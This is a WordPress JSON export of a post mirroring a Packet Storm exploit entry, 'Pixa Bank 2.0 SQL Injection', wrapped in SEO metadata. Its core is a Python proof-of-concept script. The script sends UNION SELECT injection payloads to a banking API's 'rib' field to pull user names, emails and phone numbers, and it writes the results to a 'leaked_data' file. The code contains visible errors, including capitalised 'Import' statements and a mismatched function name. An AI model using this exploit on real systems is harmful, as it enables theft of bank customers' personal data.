{"id":53084,"date":"2026-05-11T12:53:32","date_gmt":"2026-05-11T12:53:32","guid":{"rendered":"https:\/\/zero.redgem.net\/?p=53084"},"modified":"2026-05-11T12:53:32","modified_gmt":"2026-05-11T12:53:32","slug":"pixa-bank-20-sql-injection","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=53084","title":{"rendered":"\ud83d\udcc4 Pixa Bank 2.0 SQL Injection_PACKETSTORM:220748"},"content":{"rendered":"

{“lastseen”:”2026-05-11T17:16:22″,”description”:”Pixa Bank version 2.0 remote API SQL injection exploit…”,”published”:”2026-05-11T00:00:00″,”modified”:”2026-05-11T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Pixa Bank 2.0 SQL Injection”,”source”:””,”references”:””,”id”:”PACKETSTORM:220748″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[],”sourceData”:”==================================================================================================================================\\n | # Title : Pixa Bank 2.0 \u2013 API SQL Injection |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 147.0.4 (64 bits) |\\n | # Vendor : https:\/\/pixastudio.com\/ |\\n ==================================================================================================================================\\n \\n [+] Summary : This Python script is used to test and extract data from an API by repeatedly sending requests containing SQL injection payloads into a numeric input field. \\n It attempts to exploit a potential server vulnerability to extract user information such as name, email address, and phone number from the database.\\n If the query is successful, the extracted data is displayed and saved to a local text file. \\n \\t\\t\\t\\t It also includes an additional validation mode to send normal requests and detect valid code within the system.\\n \\n [+] POC : \\n \\n \\n Import requests\\n Import urllib3\\n Import json\\n \\n urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\\n \\n URL = \\”https:\/\/127.0.0.1\/api\/agence-ajax.php\\”\\n HEADERS = {\\n ‘X-Requested-With’: ‘XMLHttpRequest’,\\n \\n ‘User-Agent’: ‘Mozilla\/5.0 indoushka_CORE’\\n }\\n \\n def sangrava_miner():\\n \\n print(\\”[*] Starting the comprehensive data extraction process (indoushka version)…\\”)\\n \\n print(\\”-\\” * 60)\\n \\n for code in range(400, 900):\\n \\n sql_payload = f\\”{code}’ UNION SELECT GROUP_CONCAT(nom, 0x7c, email, 0x7c, tel) FROM users– -\\”\\n \\n try:\\n res = requests.post(URL, headers=HEADERS, data={‘rib’: sql_payload}, verify=False, timeout=5)\\n \\n if res.status_code == 200:\\n data = res.json()\\n \\n if data.get(\\”error\\”) == \\”N\\” and data.get(\\”agence\\”):\\n extracted_info = data.get(\\”agence\\”)\\n print(f\\”[!] Data extracted from {code}:\\”)\\n print(f\\” =\\u003e {extracted_info}\\”)\\n \\n with open(\\”indoushka_leaked_data.txt\\”, \\”a\\”, encoding=\\”utf-8\\”) as f:\\n f.write(f\\”Code {code}: {extracted_info}\\\\n\\”)\\n else:\\n \\n normal_rib= f\\”00100{code:03d}030030018036\\”\\n res_normal= requests.post(URL, headers=HEADERS, data={‘rib’: normal_rib}, verify=False)\\n if res_normal.json().get(\\”error\\”) == \\”N\\”:\\n print(f\\”[+] Normal Agency Revealed: {code} | {res_normal.json().get(‘agence’)}\\”)\\n \\n except Exception as e:\\n continue\\n \\n if __name__ == \\”__main__\\”:\\n indoushka_miner()\\n \\n \\n Greetings to :==============================================================================\\n jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|\\n ============================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/220748″,”cvss”:{“score”:0,”severity”:”NONE”,”vector”:”NONE”,”version”:”NONE”},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/220748\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"

{“lastseen”:”2026-05-11T17:16:22″,”description”:”Pixa Bank version 2.0 remote API SQL injection exploit…”,”published”:”2026-05-11T00:00:00″,”modified”:”2026-05-11T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Pixa Bank 2.0 SQL Injection”,”source”:””,”references”:””,”id”:”PACKETSTORM:220748″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[],”sourceData”:”==================================================================================================================================\\n | # Title : Pixa Bank 2.0 \u2013 API SQL Injection…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,13,33,53,7,11,5],"class_list":["post-53084","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-news","tag-none","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n\ud83d\udcc4 Pixa Bank 2.0 SQL Injection_PACKETSTORM:220748 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=53084\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 Pixa Bank 2.0 SQL Injection_PACKETSTORM:220748 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{“lastseen”:”2026-05-11T17:16:22″,”description”:”Pixa Bank version 2.0 remote API SQL injection exploit…”,”published”:”2026-05-11T00:00:00″,”modified”:”2026-05-11T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Pixa Bank 2.0 SQL Injection”,”source”:””,”references”:””,”id”:”PACKETSTORM:220748″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[],”sourceData”:”==================================================================================================================================n | # Title : Pixa Bank 2.0 \u2013 API SQL Injection...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=53084\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-05-11T12:53:32+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"2 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=53084#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=53084\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 Pixa Bank 2.0 SQL Injection_PACKETSTORM:220748\",\"datePublished\":\"2026-05-11T12:53:32+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=53084\"},\"wordCount\":476,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"exploit\",\"news\",\"NONE\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=53084#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=53084\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=53084\",\"name\":\"\ud83d\udcc4 Pixa Bank 2.0 SQL Injection_PACKETSTORM:220748 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-05-11T12:53:32+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=53084#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=53084\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=53084#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 Pixa Bank 2.0 SQL Injection_PACKETSTORM:220748\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 Pixa Bank 2.0 SQL Injection_PACKETSTORM:220748 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=53084","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 Pixa Bank 2.0 SQL Injection_PACKETSTORM:220748 - zero redgem","og_description":"{“lastseen”:”2026-05-11T17:16:22″,”description”:”Pixa Bank version 2.0 remote API SQL injection exploit…”,”published”:”2026-05-11T00:00:00″,”modified”:”2026-05-11T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Pixa Bank 2.0 SQL Injection”,”source”:””,”references”:””,”id”:”PACKETSTORM:220748″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[],”sourceData”:”==================================================================================================================================n | # Title : Pixa Bank 2.0 \u2013 API SQL Injection...","og_url":"https:\/\/zero.redgem.net\/?p=53084","og_site_name":"zero redgem","article_published_time":"2026-05-11T12:53:32+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"2 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=53084#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=53084"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 Pixa Bank 2.0 SQL Injection_PACKETSTORM:220748","datePublished":"2026-05-11T12:53:32+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=53084"},"wordCount":476,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","exploit","news","NONE","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=53084#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=53084","url":"https:\/\/zero.redgem.net\/?p=53084","name":"\ud83d\udcc4 Pixa Bank 2.0 SQL Injection_PACKETSTORM:220748 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-05-11T12:53:32+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=53084#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=53084"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=53084#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 Pixa Bank 2.0 SQL Injection_PACKETSTORM:220748"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/53084","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=53084"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/53084\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=53084"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=53084"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=53084"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}